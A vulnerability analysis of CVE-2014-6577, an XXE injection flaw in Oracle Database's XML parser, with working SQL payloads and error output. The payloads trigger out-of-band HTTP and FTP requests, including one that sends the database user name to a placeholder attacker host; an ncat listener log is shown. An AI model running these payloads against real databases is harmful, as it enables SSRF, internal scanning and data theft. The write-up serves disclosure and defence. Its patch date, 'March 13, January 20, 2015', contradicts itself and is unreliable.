Analysis of Oracle Database XXE Injection Vulnerability (CVE-2014-6577)
Vulnerability description: the XML Parser module of the Oracle database is vulnerable to XML External Entity (XXE) injection.
Affected Versions: 11.2.0.3, 11.2.0.4, 12.1.0.1, and 12.1.0.2
Required permissions: CREATE SESSION
Because of a security feature of Oracle's XML parser, external entities are resolved but their content is not parsed.
This prevents classic XXE attacks such as reading local files on the database server.
However, an attacker can submit crafted SQL queries that trigger the XML parser and trick the server into connecting to a remote resource over HTTP or FTP.
This can lead to data leakage through out-of-band channels, port scanning of internal systems, Server-Side Request Forgery (SSRF), or denial of service.
Vulnerable URI handlers: http:, ftp:
0x01
Oracle's XML parser can be triggered by calling the extractvalue() function on an XMLType object. The following simple example uses a basic XXE payload (a general entity pointing at a file: URI) inside a query:
select extractvalue(xmltype('<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [ <!ENTITY xxe SYSTEM "file:///etc/passwd">]>'|| '&' ||'xxe;'),'/l') from dual;
Executing the preceding query statement will cause the following error:
ORA-31001: Invalid resource handle or path name "/etc/passwd"
ORA-06512: at "SYS.XMLTYPE", line 310
ORA-06512: at line 1
31001. 00000 - "Invalid resource handle or path name \"%s\""
*Cause: An invalid resource handle or path name was passed to the XDB hierarchical resolver.
*Action: Pass a valid resouce handle or path name to the hierarchical resolver.
This happens because the file: URI handler is converted into an XDB repository path rather than an operating-system path.
0x02
Switching to the http: URI handler produces a different error. The sample query is:
select extractvalue(xmltype('<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [ <!ENTITY xxe SYSTEM "http://IP/test">]>'|| '&' ||'xxe;'),'/l') from dual;
The database server error is as follows:
ORA-31020: The operation is not allowed, Reason: For security reasons, ftp and http access over XDB repository is not allowed on server side
ORA-06512: at "SYS.XMLTYPE", line 310
ORA-06512: at line 1
31020. 00000 - "The operation is not allowed, Reason: %s"
*Cause: The operation attempted is not allowed
*Action: See reason and change to a valid operation.
This error shows that the ftp: and http: URI handlers are at least recognised by the XML parser. Note that the query above does not send any HTTP request to the attacker's system.
0x03
Now consider another XXE payload. This one references a parameter entity (declared with %) from inside the DTD rather than a general entity from the document body:
select extractvalue(xmltype('<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [ <!ENTITY % remote SYSTEM "http://IP/test"> %remote; %param1;]>'),'/l') from dual;
Executing this query produces the same error as above (ORA-31020). This time, however, the server is successfully tricked into sending an HTTP request for the resource "test" before the error is raised. The following is the HTTP log on the attacker's server:
ncat -lvp 80
Ncat: Version 6.25 ( http://nmap.org/ncat )
Ncat: Listening on :::80
Ncat: Listening on 0.0.0.0:80
Ncat: Connection from DB_IP.
Ncat: Connection from DB_IP:27320.
GET /test HTTP/1.0
Host: DB_IP
Content-Type: text/plain; charset=utf-8
Traditionally, forcing the database server to send HTTP requests to external resources requires privileges on the UTL_HTTP package. Because extractvalue() is available to every database user, XXE injection provides another way to trigger out-of-band HTTP requests, and this method does not require those privileges.
0x04
The ftp: URI handler can also be used to trigger Oracle's XML parser. In the following query, the database user name (the USER function) is embedded in the URI and is therefore sent as the FTP user name:
select extractvalue(xmltype('<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [ <!ENTITY % remote SYSTEM "ftp://'||user||':bar@IP/test"> %remote; %param1;]>'),'/l') from dual;
The database server returns an error (note that the error code differs from the one above because the supplied credentials cannot be used to log on to the remote FTP server):
ORA-31011: XML parsing failed
ORA-19202: Error occurred in XML processing
LPX-00202: could not open "ftp://SYSTEM:bar@IP/test" (error 402)
Error at line 1
ORA-06512: at "SYS.XMLTYPE", line 310
ORA-06512: at line 1
31011. 00000 - "XML parsing failed"
*Cause: XML parser returned an error while trying to parse the document.
*Action: Check if the document to be parsed is valid.
As the LPX-00202 message shows, the database user name (here SYSTEM) is included as the FTP user name in the FTP traffic sent to the attacker's server.
Conclusion
This vulnerability has been reported to Oracle, which released a patch on March 13, January 20, 2015.